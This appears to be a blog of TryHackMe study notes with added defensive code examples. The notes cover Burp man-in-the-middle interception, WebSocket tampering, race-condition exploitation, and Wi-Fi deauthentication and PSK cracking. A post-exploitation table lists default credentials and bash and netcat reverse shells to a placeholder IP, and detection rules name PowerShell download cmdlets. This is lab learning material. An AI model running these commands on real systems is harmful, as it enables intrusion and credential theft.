AI: old sAInt nick
Splunk: Did you SIEM?
Phishing: Merry Clickmas
Linux CLI: Shells Bells
Certificate mismanagement: Even if we’re horribly mismanaged, there’ll be no sad faces on SOC-mas!
Parts of a certificate:
Breakdown of what happens with a certificate:
Browsers typically don’t trust self-signed certificates because there is no third-party verification. Just because you say you’re this entity doesn’t mean you are. Being too trusting leads to man-in-the-middle attacks. Trusted CA certificates are verified by a CA that acts as a trusted third party to confirm an entity is who they say they are.
Resolve the target website to self in order to prevent DNS logs from alerting others: `echo "<ip-address> <web-address.tld>" >> /etc/hosts`. Can confirm with `cat /etc/hosts`. Next, use Burp to set self up as the man-in-the-middle (MITM): Proxy > Intercept off > Proxy Settings. Add a new listener for our IP address; set it to port 8080 and toggle on Specific address to specify own address. Burp comes with its own self-signed certificate, and since users were already used to clicking Advanced and Accept, it won’t faze them with this new cert.
Reroute all traffic to own machine by adding resolution for website to own IP, setting self up as gateway (full attack is more in depth, just out of scope for this task).
(Dummy mode for this task involves running a script to simulate interactions with the website. If in the wild, it’s not necessary.)
Go to HTTP History section of Burp to see intercepted requests.
Use the mitm attack to sniff out admin creds and find flags along the way.
Burp Suite module.
WebSockets: It came without buffering! It came without lag!
WebSockets let your browser and the server keep a constant line of communication open. Great for things like live chat apps, real-time games, and live data feeds. Since there is no need for extra requests once the line is opened, there’s less overhead and faster communication.
Since WebSockets stay open and active, they can be taken advantage of if proper security measures aren’t in place. Common vulnerabilities to be aware of:
When an attacker intercepts and changes the messages sent between browser and server. If it’s a transaction, they could bypass security checks, send unauthorized requests, or alter important data like usernames, payment amounts, or access levels, possibly rerouting payments to a different account. Since the WebSockets connection is open in real-time, all changes are immediate. Messages could also be changed to grant admin rights or insert malicious commands to take over the server.
Since WebSockets don’t have the same security protections as traditional HTTP connections, devs need to add vigorous checks like message validation or encryption. The impact of changing messages depends on how the app uses the data and what kind of data it is. Four possible outcomes include:
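As an added example of the server-side message validation the paragraph above calls for (this is not code from the original post or from TryHackMe), the handler below validates each client-to-server WebSocket text frame: size limit, JSON shape, an exact allow-listed field set per message type, strict types, value ranges, and authorization taken from the session established at the handshake rather than from anything inside the frame. The message types, field names, limits and `Session` class are assumptions made for this example.

```python
import json

MAX_FRAME_BYTES = 4096        # assumed limit; tune to the app's real messages
TRANSFER_LIMIT = 10_000       # assumed business rule

# Allowed message types and the exact fields each may carry (constructed schema).
SCHEMAS = {
    "chat":     {"text": str},
    "transfer": {"to": str, "amount": int},
    "ban_user": {"target": str},    # admin-only action
}
ADMIN_ONLY = {"ban_user"}


class Session:
    """Identity established when the WebSocket was opened (e.g. from a validated
    session cookie). The client never gets to restate it inside a message."""

    def __init__(self, user, role):
        self.user = user
        self.role = role


def handle_frame(session, raw):
    """Validate one text frame. Returns ("ok", action) or ("rejected", reason).
    Anything not explicitly allowed is rejected; nothing is silently dropped."""
    if len(raw.encode("utf-8")) > MAX_FRAME_BYTES:
        return "rejected", "frame too large"
    try:
        msg = json.loads(raw)
    except ValueError:
        return "rejected", "not JSON"
    if not isinstance(msg, dict) or not isinstance(msg.get("type"), str):
        return "rejected", "missing type"
    schema = SCHEMAS.get(msg["type"])
    if schema is None:
        return "rejected", f"unknown type {msg['type']!r}"

    # Exact field set: an extra "from", "role" or "is_admin" field is a tampering
    # signal, so the frame is rejected instead of the field being ignored.
    fields = {k: v for k, v in msg.items() if k != "type"}
    if set(fields) != set(schema):
        return "rejected", "unexpected or missing fields"
    for name, typ in schema.items():
        if type(fields[name]) is not typ:     # `is`: bool would pass isinstance(int)
            return "rejected", f"bad type for {name}"

    # Authorization comes from the session's role, never from the message.
    if msg["type"] in ADMIN_ONLY and session.role != "admin":
        return "rejected", "not authorised"
    if msg["type"] == "transfer" and not (0 < msg["amount"] <= TRANSFER_LIMIT):
        return "rejected", "amount out of range"

    # Sender identity likewise comes from the session.
    action = {"actor": session.user, "type": msg["type"], **fields}
    return "ok", action


if __name__ == "__main__":
    alice = Session("alice", "user")
    for frame in ('{"type":"transfer","to":"bob","amount":50}',
                  '{"type":"transfer","to":"mallory","amount":50,"from":"bob"}',
                  '{"type":"transfer","to":"bob","amount":-500}',
                  '{"type":"ban_user","target":"bob"}'):
        print(frame, "->", handle_frame(alice, frame))
```

The tampered frames in the usage block (a spoofed `from` field, a negative amount, an admin-only action from a normal user) are the kinds of edits Burp's WebSocket interception makes trivial; each is rejected by a different check, which is the point of layering them.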
Turn on FoxyProxy and open Burp Suite to Proxy > Intercept > Proxy settings > WebSocket interception rules. In this instance, enable intercepting both directions. Use the intercept to track different cars and inject messages for other people.
Burp Suite module.
Web timing attacks: If I can’t steal their money, I’ll steal their joy!
This type of vulnerability isn’t about sending bad data; it’s about how the data is sent. In its simplest form, a web timing attack means gleaning information from a web application by reviewing how long it takes to process our data. By making tiny changes in what is sent or how it’s sent and observing the response time, we can access information we’re not authorized to. Race conditions are a subset of web timing attacks where you can cause the web application to do unintended actions on our behalf. Time differences from 1300ms to 5ns have been used for attacks. They can be hard to detect, but HTTP/2 has made it a bit easier to find and exploit them.
HTTP/2 supports a feature called single-packet multi-requests. With single-packet single-request, you couldn’t tell if delays were from processing or network latency. Stacking multiple requests in the same TCP packet with single-packet multi-request eliminates network latency from the equation. All that remains is server latency.
Two main categories:
Time-of-Check to Time-of-Use (TOCTOU) flaw.
Need to be able to intercept traffic, so using Burp Suite and the Burp browser. Intercept the POST request for the transfer and send it to Repeater. From the Repeater window, after clicking on the request, use CTRL+R to copy the tab 10 times. Click the plus sign to create a tab group. Click the down caret at the Send button and select Send group in parallel (last-byte sync), then send the request.
Since this flaw was caused by python code running the transaction and the balance check separately, there are a few recommended fixes.
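As an added example (not the room’s own code), the toy below reproduces the flaw described above in plain Python and shows one fix. The vulnerable version checks the balance and debits it as two separate steps; a `threading.Barrier` stands in for Burp’s “send group in parallel (last-byte sync)” so that all ten copies of the request pass the check before any of them debits. The fixed version holds one lock across check and debit. The `Account` class, amounts and thread count are assumptions for this example.

```python
import threading


class Account:
    """Toy in-memory account, constructed for this example."""

    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()


def transfer_vulnerable(acct, amount, sync):
    """Balance check and debit as two separate steps (TOCTOU).

    `sync` is a Barrier standing in for last-byte sync: every request gets past
    the check before any of them debits, which is the interleaving that turns
    the gap between check and use into a loss.
    """
    enough = acct.balance >= amount     # time of check
    sync.wait()                         # all requests have checked, none has debited
    if enough:
        with acct.lock:                 # the debit itself is atomic (like one UPDATE)...
            acct.balance -= amount      # ...but nothing ties it to the check above
    return enough


def transfer_safe(acct, amount):
    """Check and debit under one lock so no other request can slip in between.
    With a SQL backend the equivalent is a single conditional statement such as
    UPDATE accounts SET balance = balance - :amt WHERE id = :id AND balance >= :amt,
    treating a rowcount of 0 as a failed transfer."""
    with acct.lock:
        if acct.balance < amount:
            return False
        acct.balance -= amount
        return True


def run_parallel(fn, n):
    """Run fn(i) on n threads and collect the return values in order."""
    results = [None] * n

    def worker(i):
        results[i] = fn(i)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def demo_vulnerable(requests=10):
    """Ten parallel 100-unit transfers from a 100-unit account, Repeater-group style.
    Returns (final balance, number of transfers that succeeded)."""
    acct = Account(100)
    sync = threading.Barrier(requests)
    results = run_parallel(lambda i: transfer_vulnerable(acct, 100, sync), requests)
    return acct.balance, results.count(True)


def demo_safe(requests=10):
    acct = Account(100)
    results = run_parallel(lambda i: transfer_safe(acct, 100), requests)
    return acct.balance, results.count(True)


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())   # balance goes to -900, all 10 "succeed"
    print("safe:      ", demo_safe())         # balance 0, exactly one succeeds
```

The detail worth noticing is that making the debit atomic on its own does not help; the fix is making the check and the debit one indivisible step, whether with a lock, a database transaction with row locking, or a conditional update.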
Grab the flag from one of the transactions performed.
Race Conditions room.
Wi-Fi attacks: If you’d like to WPA, press the star key!
For educational purposes only:
Basic steps:
The handshake doesn’t directly reveal the PSK, but involves encrypted messages that can only be understood with the same PSK.
Anyone can “hear” this conversation happening, and can use it as the basis to attempt offline brute-forcing or dictionary attacks. This involves trying different possible passwords and comparing the results to the captured handshake until the same result is achieved.
In terminal:
`iw dev` to show any wireless devices available, and their configuration.
`sudo iw dev wlan2 scan` to use wlan2 to scan for available networks.
BSS(ID) can help identify the maker of the device, and SSID indicates it is advertising a network, so it is an AP of some sort. RSN (Robust Security Network) is part of the WPA2 standard, so the network is using WPA2. This typically defines the encryption and authentication settings. Group and Pairwise ciphers are CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol), the encryption method used by WPA2. Authentication suites is PSK, indicating it is WPA2-Personal with a shared password for authentication. DS Parameter set is channel 6, showing it is a 2.4GHz network.
Monitor mode on the wireless device allows it to listen to all traffic on a specific channel, whether directed at the device or not. Captures all traffic within range for analysis without ever joining the network. To set the device in monitor mode:
`sudo ip link set dev wlan2 down` to turn off the device.
`sudo iw dev wlan2 set type monitor` to set the device to monitor mode.
`sudo ip link set dev wlan2 up` to turn the device on.
Using 2 terminals to observe the capture and issue commands:
`sudo airodump-ng wlan2` to start capturing traffic, specifically targeting handshake packets (note: by default airodump-ng automatically switches the device into monitor mode if it’s available).
`sudo airodump-ng -c 6 --bssid <MAC-address> -w output-file wlan2` to target a specific channel and MAC address, and save the captures to a few files that start with “output-file”.
STATION shows the BSSID of the connected device.
`sudo aireplay-ng -0 1 -a <AP-MAC-address> -c <Station-MAC-address> wlan2` to start the deauth attack: `-0` to specify a deauth attack, `1` to specify sending 1 deauth, `-a` the BSSID of the AP, `-c` the BSSID of the client to deauth.
Success is shown when WPA handshake appears in the top right corner. Can then move on to cracking the PSK by using aircrack-ng: `sudo aircrack-ng -a 2 -b <AP-MAC-address> -w </path/to/wordlist.txt> output*cap` where:
`-a 2` indicates WPA/WPA2 attack mode, `-b` indicates the AP MAC address, `-w` indicates the dictionary list to use, and `output*cap` is the name of the output files to run the attack against.
Once the PSK is cracked, can use it to join the network, after turning off airodump-ng. Can’t join a network if the device is in monitor mode. Can join the wireless network with:
```shell
:~$ wpa_passphrase <SSID> '<PSK-HERE>' > config
:~$ sudo wpa_supplicant -B -c config -i wlan2
```
Retrieve SSID, BSSID, and PSK info.
Networking module
Phishing: He had a brain full of macros, and had shells in his soul.
GRC: Nine o’clock, make GRC fun, tell no one.
Shellcodes: Shellcodes of the world, unite!
AWS log analysis: Oh, no. I’M SPEAKING IN CLOUDTRAIL!
Sandboxes: If you can’t find a nice malware to use, I’m not going.
XXE: SOC-mas XX-what-ee?
Atomic Red Team: I’m all atomic inside!
There will be gaps in your defenses, but they don’t have to be huge; they can be minimized. Two main reasons for detection gaps:
All cyber attacks follow a fairly standard process referred to as the Unified Cyber Kill Chain:
Initial Recon > Initial Compromise > Establish Foothold > Escalate Privileges > either Internal Recon or GOTO 80 > Move Laterally > Maintain Presence > Escalate Privileges > Complete Mission (80)
The blue team dream is to detect and prevent all attacks at step 1, but that is impractical. Need to try to detect at each step so any one miss along the chain isn’t disastrous. The real goal is to detect before the last phase of goal execution. The MITRE ATT&CK framework is a collection of tactics, techniques, and procedures (TTPs) seen implemented in the wild. It has a Navigator tool to investigate TTPs. All information is theoretical. The Atomic Red Team library is a collection of test cases mapped to the MITRE ATT&CK framework.
Drop atomics in PowerShell by using Invoke-AtomicTest. Parameters:
| Parameter | Explanation | Example |
|---|---|---|
| -AtomicTechnique | Defines technique to emulate. Can use complete name or “TXXXX” value. Can be omitted. | invoke-atomictest -atomictechnique T1566.001 |
| -ShowDetails | Shows details of each test in the Atomic. | invoke-atomictest T1566.001 -showdetails |
| -ShowDetailsBrief | Shows the title of each test in the Atomic. | invoke-atomictest T1566.001 -showdetailsbrief |
| -CheckPrereqs | Checks if all necessary components are present for testing. | invoke-atomictest T1566.001 -checkprereqs |
| -TestNames | Sets tests to execute using Atomic Test name. | invoke-atomictest T1566.001 -testnames "Download Macro-Enabled Phishing Attachment" |
| -TestGuids | Sets test to be executed using test id. | invoke-atomictest T1566.001 -testguids 114ccff9-ae6d-4547-9ead-4cd69f687306 |
| -TestNumbers | Sets test to be executed using test number. Limited to the Atomic Technique. | invoke-atomictest T1566.001 -testnumbers 2,3 |
| -Cleanup | Run the cleanup commands configured to revert machine to normal. | invoke-atomictest T1566.001 -testnumbers 2 -cleanup |
Can use Windows Event Logs/Sysmon to find actions that take place during testing.
Detecting the Atomic doesn’t matter if you don’t do anything about it. Can create custom alerting rules once we know what artefacts were created during attack. Look for things that don’t often run from scripts in the background, i.e. Invoke-WebRequest.
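As an added example of turning the artefacts from an Atomic run into an alerting rule (not code from the original post, the Atomic Red Team project or TryHackMe), the script below runs a few rules over Sysmon Event ID 1 (process creation) records and flags PowerShell launches whose command line carries something that rarely runs from background scripts, such as `Invoke-WebRequest`. The event records are constructed to look like what a SIEM would hold, the command lines are representative rather than copied from any real test, and the rule-to-technique mapping uses standard ATT&CK IDs (T1059.001 PowerShell, T1564.003 Hidden Window).

```python
import re
from ntpath import basename   # handles Windows paths even when run on Linux

# Constructed Sysmon Event ID 1 records, shaped like what lands in a SIEM.
EVENTS = [
    {"EventID": 1, "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -c "Invoke-WebRequest -Uri http://example.invalid/attachment.xlsm '
                    '-OutFile $env:TEMP\\attachment.xlsm"'},
    {"EventID": 1, "User": "CORP\\svc-backup",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     # the Base64 here is an arbitrary constructed string, not a real payload
     "CommandLine": "powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"EventID": 1, "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"EventID": 1, "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe C:\\Users\\jdoe\\notes.txt"},
]

# (rule name, ATT&CK technique, command-line pattern). Only applied to PowerShell.
RULES = [
    ("PowerShell web download", "T1059.001",
     re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient", re.I)),
    ("PowerShell encoded command", "T1059.001",
     re.compile(r"\s-(?:EncodedCommand|enc?|ec)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("PowerShell hidden window", "T1564.003",
     re.compile(r"\s-W(?:indowStyle)?\s+Hidden\b", re.I)),
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}


def detect(events):
    """Return one finding per (event, rule) hit on PowerShell process creations."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 1 or basename(ev["Image"]).lower() not in POWERSHELL:
            continue
        for name, technique, pattern in RULES:
            if pattern.search(ev["CommandLine"]):
                findings.append({
                    "rule": name,
                    "technique": technique,
                    "user": ev["User"],
                    "parent": basename(ev["ParentImage"]),   # context for the analyst
                    "cmd": ev["CommandLine"],
                })
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"[{f['technique']}] {f['rule']}: {f['user']} via {f['parent']}: {f['cmd'][:60]}")
```

Running it flags the download in the first event and both the encoded command and the hidden window in the second; the ordinary `Get-ChildItem` launch produces nothing, which is the false-positive rate you want from a rule keyed on rarely-scripted cmdlets rather than on `powershell.exe` itself.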
Identify the atomic test that will take advantage of a command and scripting interpreter, conduct the test, extract artefacts, and grab the flag.
Atomic Red Team room.
Log analysis: Even if I wanted to go, their vulnerabilities wouldn’t allow it.
Log analysis is crucial to blue-team work.
ELK combines data analytics and processing tools to make log analysis manageable. Forms dedicated stack to aggregate logs from multiple sources into central place. Today starts with Kibana Discover interface.
| Query/Syntax | Description | Example |
|---|---|---|
| " " | Search for specific values. Exact search. | "TryHackMe" |
| * | Wildcard for similar matches to value provided | United* (returns United Kingdom and United States) |
| OR | Shows documents that contain either value provided | "United Kingdom" OR "England" |
| AND | Shows documents that contain both values provided | "Ben" AND "25" |
| : | Search a specific field in the document. Field availability depends on fields available in document. | ip.address: 10.10.10.10 |
Can filter out noise by selecting/unselecting certain fields. Adding fields just applies correct KQL syntax through GUI. Can also filter specific values in fields by clicking field in left pane and adding/removing with +/-. Can click and drag on timeline to select time covered in search.
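As an added example (not code from the original post, TryHackMe or Elastic), here is a small evaluator for the KQL subset in the table above, run over a handful of constructed documents: exact quoted values, `*` wildcards, `OR`, `AND` (which binds tighter than `OR`, as in KQL) and `field: value`. It is a teaching model of how the Discover search bar matches, not Kibana's parser; the documents and field names are constructed.

```python
import re
from fnmatch import fnmatchcase

# Constructed documents standing in for hits in a Kibana index.
DOCS = [
    {"id": 1, "name": "Ben", "age": "25", "country": "United Kingdom", "ip.address": "10.10.10.10"},
    {"id": 2, "name": "Amy", "age": "31", "country": "United States", "ip.address": "10.10.10.11"},
    {"id": 3, "name": "Ben", "age": "40", "country": "England", "ip.address": "192.168.1.5"},
    {"id": 4, "name": "TryHackMe", "age": "7", "country": "Ireland", "ip.address": "10.10.10.10"},
]

TOKEN = re.compile(r'"[^"]*"|\S+')


def tokenize(query):
    """Split on whitespace but keep quoted phrases whole; glue `field: value`
    (written with a space after the colon, as in the table) into one term."""
    out = []
    for tok in TOKEN.findall(query):
        if out and out[-1].endswith(":") and not out[-1].startswith('"'):
            out[-1] += tok
        else:
            out.append(tok)
    return out


def match_value(value, pattern):
    """Quoted pattern: exact match. Bare pattern: wildcard match (`*`, `?`)."""
    if len(pattern) >= 2 and pattern[0] == '"' and pattern[-1] == '"':
        return value == pattern[1:-1]
    return fnmatchcase(value, pattern)


def match_term(doc, term):
    """`field:pattern` tests one field; a bare term tests every field."""
    field, sep, pattern = term.partition(":")
    if sep and not term.startswith('"'):
        return field in doc and match_value(str(doc[field]), pattern)
    return any(match_value(str(v), term) for v in doc.values())


def matches(doc, query):
    """AND binds tighter than OR, so a query is a disjunction of conjunctions."""
    groups, current = [], []
    for tok in tokenize(query):
        if tok.upper() == "OR":
            groups.append(current)
            current = []
        elif tok.upper() != "AND":
            current.append(tok)
    groups.append(current)
    return any(group and all(match_term(doc, t) for t in group) for group in groups)


def search(query, docs=DOCS):
    """Return the ids of documents matching the query."""
    return [d["id"] for d in docs if matches(d, query)]


if __name__ == "__main__":
    for q in ('"TryHackMe"', "United*", '"United Kingdom" OR "England"',
              '"Ben" AND "25"', "ip.address: 10.10.10.10"):
        print(f"{q:35} -> {search(q)}")
```

The `"Ben" AND "25"` case shows why the exact form matters: document 3 also has a `Ben` but its age is `40`, so only document 1 comes back.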
Without the website confirming things like file type, size, and file contents, it can open the door for attacks on the webserver.
One of the easiest paths of attack is weak or default creds. Common weak/default creds an attacker might try:
| Username | Password |
|---|---|
| admin | admin |
| administrator | administrator |
| admin@domainname | admin |
| guest | guest |
Post vulnerability exploitation commands to try:
| Command | Use |
|---|---|
| ls | Gives idea of files and directories around you |
| cat | Outputs contents of documents like text files |
| pwd | Gives idea of where in system you are |
| whoami | Lets you know who you are |
| hostname | System name and potentially its role |
| uname -a | System info like OS, kernel version, etc. |
| id | Shows any groups current user is assigned to |
| ifconfig | Network setup info |
| bash -i >& /dev/tcp/<your-ip>/<port> 0>&1 | Begins reverse shell via bash |
| nc -e /bin/sh <your-ip> <port> | Begin reverse shell via Netcat |
| find / -perm -4000 -type f 2>/dev/null | Finds SUID files, useful for privesc |
| find / -writable -type f 2>/dev/null \| grep -v "/proc/" | Find files with writable permissions |
Investigate the attack in Kibana to answer the blue questions, then recreate the attack to answer the red questions. Had to watch the end of the video to get my shell going.
Advanced ELK queries room(?).
Log analysis: One man’s false positive is another man’s potpourri.
Because of reasons and obligations I’m already 4 days behind and AoC just started. Here we go…
Detection Engineering: rules defined in a SIEM to identify malicious or suspicious activity from event logs. Analysis of SIEM events takes place in the SOC. The SOC has the superpower of calling users or processing change requests to confirm user actions to eliminate false positives.
Kryptonite to SOC superpower:
Context of user, department, tools, etc. helps analyst make right judgement. Networking team may use Wireshark (doodoo doodoo doo) but use of it by HR or Finance would be out of place.
Correlate past and future events to create a timeline that tells the story of what is happening. Important to note artifacts important enough to connect the dots: IPs, machine names, user names, hashes, file paths, etc. Always ensure evidence supports hypotheses.
Hamburger menu > Discover > set date/time range. Add columns from the fields on the left. Best practice is to have named accounts for any admin activity so there is accountability and attribution for each action performed. Seeing generic service admin accounts should raise suspicion. Note: PowerShell encoded commands use Base64, so they can be decoded with CyberChef.
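As an added example (not code from the original post or TryHackMe) of the two checks in the paragraph above, the script below decodes a PowerShell `-EncodedCommand` argument and flags activity from generic admin or service accounts. The detail CyberChef hides from you is the text encoding: PowerShell Base64-encodes the script as UTF-16LE, so decoding the bytes as UTF-8 gives a NUL-padded mess and the "From Base64" step has to be followed by a UTF-16LE decode. The account watch-list and sample records are constructed.

```python
import base64
import re

# Constructed watch-list of shared, non-attributable account names.
GENERIC_ACCOUNTS = {"administrator", "admin", "svc-admin", "service"}

ENC_ARG = re.compile(r"-(?:EncodedCommand|enc?|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_for_powershell(script):
    """Produce what `powershell -EncodedCommand` expects: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script from a -EncodedCommand/-enc/-e argument, or None.
    The UTF-16LE step is the one that trips people up: the same bytes read as
    UTF-8 come out as 'd\\x00i\\x00r\\x00' instead of 'dir'."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def triage(record):
    """record: {"user": "DOMAIN\\name", "cmd": "..."}; returns context flags."""
    flags = []
    account = record["user"].split("\\")[-1].lower()
    if account in GENERIC_ACCOUNTS:
        flags.append("generic admin/service account: no individual attribution")
    decoded = decode_encoded_command(record["cmd"])
    if decoded is not None:
        flags.append("encoded command decodes to: " + decoded)
    return flags


# Constructed sample records; the encoded payload is built here so it is
# reproducible and obviously not lifted from a real incident.
SAMPLE = [
    {"user": "CORP\\Administrator",
     "cmd": "powershell.exe -NoP -enc "
            + encode_for_powershell("Invoke-WebRequest -Uri http://example.invalid/x -OutFile x.exe")},
    {"user": "CORP\\jdoe", "cmd": "powershell.exe Get-Date"},
]


if __name__ == "__main__":
    for rec in SAMPLE:
        print(rec["user"], "->", triage(rec) or "nothing notable")
```

`dir` encodes to `ZABpAHIA`, which is a handy fixed value for checking any decoder (CyberChef included) against.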
Answer questions based on info from elastic and Cyber Chef.
Investigating with ELK 101 room.
OPSEC: Maybe SOC-mas music, he thought, doesn’t come from a store?
SQL injection: Inject the Halls with EXEC Queries
Malware analysis: She sells C# shells by the C2shore
Disk forensics: Have a Holly, Jolly Byte!
Log analysis: ‘Tis the season for log chopping
Memory corruption: Memories of Christmas Past
Reverse engineering: A Christmas DOScovery: Tapes of Yule-tide Past
Brute-forcing: Baby, it’s CeWLd outside
Brute-forcing: Hydra is Coming to Town
Log analysis: O Data, All Ye Faithful
Machine learning: Chatbot, tell me, if you’re really safe
OWASP: Open Web Application Security Project
Practical application through an example attack.
Target module’s Sub-tabs:
Took advantage of some simple ones to keep the streak going but keep working on other things. They were mostly explanatory setup items. Today’s task doesn’t take any action to answer the questions, but might have a couple of noteworthy items.
Burp Proxy opens a web interface at 127.0.0.1:8080 (by default). Either need to alter browser settings to use the proxy, or use the Firefox extension FoxyProxy, which allows saving proxy profiles so switching between Burp and regular use is simple.
Day 53 and I’m still saying “I’m not a robot” in a Frank Drebin voice. Today I’m sticking to one task, Introduction to the Burp Proxy.
Still no archive. Possibly farther from having an archive. And still only in the introductory tasks of the Burp room.
The two tasks I think I’m going to stick to are on Installation and The Dashboard, so there may not be many notes.
Last night I finished off “HTTP in detail”. There was a cool little emulator to create HTTP requests and see the code sent, then the response contained the flag for that particular question. Today starts Burp.
Cookies are saved when you receive a “Set-Cookie” header from a web server. With every subsequent request to the server, the cookie gets sent along. HTTP is stateless, so cookies can remind the server who you are, what personal settings for the website may be set, or whether you have visited the website before. Sample exchange:
```http
GET / HTTP/1.1
Host: cookies.thm
User-Agent: xxxx
I’m now at over 40 posts and the streak is at 46. Not a bad difference considering some of the days I had trying to keep the streak alive but not enough time to write about it. The home page is getting kind of long, so in addition to the archive I’m trying to get working, I think I need to also incorporate a paginate, although the newest gem for Jekyll apparently doesn’t work with GitHub Pages. I’ll have to add that to the list of things to get sorted. Now as Zaphod and Ford say - to business.
Status codes inform client of the outcome of its request and potentially how to handle it. Can be broken into 5 different ranges:
Since I’m trying to get an archives section going and cut down the clutter on the homepage I’m only doing one task and it’s a short one.
HTTP is the set of rules used for communicating with webservers for transmitting webpage data, whether it’s HTML, images, videos, etc.
While HTML provides structure and content, JavaScript controls functionality. JS allows dynamic pages, like changing the style of a button when a particular event happens on the page. JS is added within the page source code and can be loaded within `<script>` tags or referenced with the src attribute, `<script src="/location/of/javascript_file.js"></script>`.
New room in the path, “How Websites Work”. Also, day 41 of the streak.
MySQL is typically not the first port of call in a network, and definitely unlikely as a path in a CTF. For the purposes of this lesson, credentials were found while enumerating subdomains of a web server, but they didn’t match up to an SSH user, so trying them with MySQL. If trying to use non-Metasploit tools:
https://nmap.org/nsedoc/scripts/mysql-enum.html
https://www.exploit-db.com/exploits/23081
Relational database management system (RDBMS) based on Structured Query Language (SQL).
This is leveraging SMTP information to gain SSH access to the system. The previous enumeration revealed an open SSH port, a username, and the type of SMTP server and OS running.
Email requires protocol pair, SMTP and POP/IMAP. SMTP server performs three basic functions:
The first tool needed on a local machine to do more advanced enumeration is the nfs-common package (Linux?). Important to have on any machine that uses NFS, as client or server. Includes lockd, statd, showmount, nfsstat, gssd, idmapd, and mount.nfs. The primary concern for enumeration purposes is showmount and mount.nfs because they’re most useful for extracting information from the NFS share.
NFS - Network File System allows sharing directories and files with others over a network. Allows access almost as if they were local files by mounting all or a portion of a file system on a server. User privileges can be assigned. Further nitty gritty reading: https://docs.oracle.com/cd/E19683-01/816-4882/6mb2ipq7l/index.html
FTP session operates using two channels, command/control and data. The command channel is used for commands and replies, while the data channel transfers data. Functions as a client-server protocol. Comes in Active and Passive connections.
Same process as with SMB, start with a port scan.
Made it to 31 days in the streak, but this will be a short one.
Vulns like CVE-2017-7494 can allow RCE, but more likely to come across misconfigurations that allow access. One common misconfig allows gaining information that in turns allows shell access.
AoC is over once again. Prizes were not won, but at least fun was had, several new things were learned, and the dust was shaken off a few older things. I took a super easy question yesterday to keep the streak alive, and now I need to figure out where to go. Now that I’m a subscriber, I can go further in a learning path than I have before. The problem is I didn’t remember what I started. I thought I hit the paywall and had pivoted to another learning path, but I’m not entirely sure now. At the moment, I’m on the complete beginner path getting into the Network Services Room. I guess I’ll finish that and see where I end up.
Defense in Depth: Mission ELFPossible: Abominable for a Day
One to go…
Attack Surface Reduction: Threats are failing all around me
Two to go…
MQTT: Have yourself a merry little webcam
The formal definition of IoT may change depending on who is setting it, but it can best be used as a broad categorization of “a device that sends and receives data to communicate with other devices and systems.” IoT categorizes unique devices, e.g. smart fridges, that don’t match other categories, such as mobile devices. They tend to be lightweight, with only essential functionality and features included. One of the modern features that may be left out or overlooked is security.
Firmware: Binwalkin’ around the Christmas tree
Focusing on firmware reverse engineering from a security standpoint. It’s possible a smart watch could have firmware programmed to send all incoming messages, emails, etc. to a specific IP unbeknownst to the user. Steps to follow:
Hardware Hacking: Wiggles go brr
Too many things going on and had to skip a couple days, but kept the streak going at least through answering some random simple questions. Now I have three days worth of AoC to catch up on though.
Sigma: Lumberjack Lenny Learns New Rules
Threat detection involves proactively pursuing and analysing abnormal activity within an ecosystem to identify malicious signs of compromise or intrusion within a network.
Secure Coding: Filtering for Order Among Chaos
Validating input is the castle wall of your web app castle. It merits the same amount of hardening as its medieval counterpart. A generally effective way of validating input is first to know how a specific piece of data is going to be processed by the rest of the app. Then go through syntax and semantic validation checks to ensure user-provided values are correct in syntax and in logical value. Then comes filtering, with very specific rules as to which forms will be accepted, immediately stripping or dropping ones that don’t fit the predefined category.
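As an added example of the three stages just described (not code from the original post or TryHackMe), the function below validates an order form in that order: syntax first (is the value even the right shape?), then semantics (is a well-formed value sensible for this app?), then filtering against a fixed allow-list for the one field that ends up inside a query. The field names, limits and the `sort_by` allow-list are assumptions for this example; `today` is injectable so the date check is reproducible.

```python
import re
from datetime import date, timedelta

ALLOWED_SORT = {"price", "name", "date"}   # the only column names the app will ever order by
MAX_QUANTITY = 100                          # assumed business rule


def validate_order(form, today=date(2024, 12, 6)):
    """Return (clean_values, {}) on success or (None, {field: reason}) on failure.
    `form` holds the raw string fields exactly as received."""
    errors = {}
    qty_raw = form.get("quantity", "")
    date_raw = form.get("delivery_date", "")
    sort_raw = form.get("sort_by", "name")

    # 1. Syntax: the shape of each value. Nothing else runs until this passes.
    if not re.fullmatch(r"[1-9][0-9]{0,3}", qty_raw):
        errors["quantity"] = "must be a positive whole number"
    if not re.fullmatch(r"[0-9]{4}-[0-9]{2}-[0-9]{2}", date_raw):
        errors["delivery_date"] = "must be YYYY-MM-DD"
    if not re.fullmatch(r"[a-z_]{1,20}", sort_raw):
        errors["sort_by"] = "must be a short lowercase identifier"
    if errors:
        return None, errors

    # 2. Semantics: well-formed values that make no sense for this application.
    quantity = int(qty_raw)
    if quantity > MAX_QUANTITY:
        errors["quantity"] = f"at most {MAX_QUANTITY} per order"
    try:
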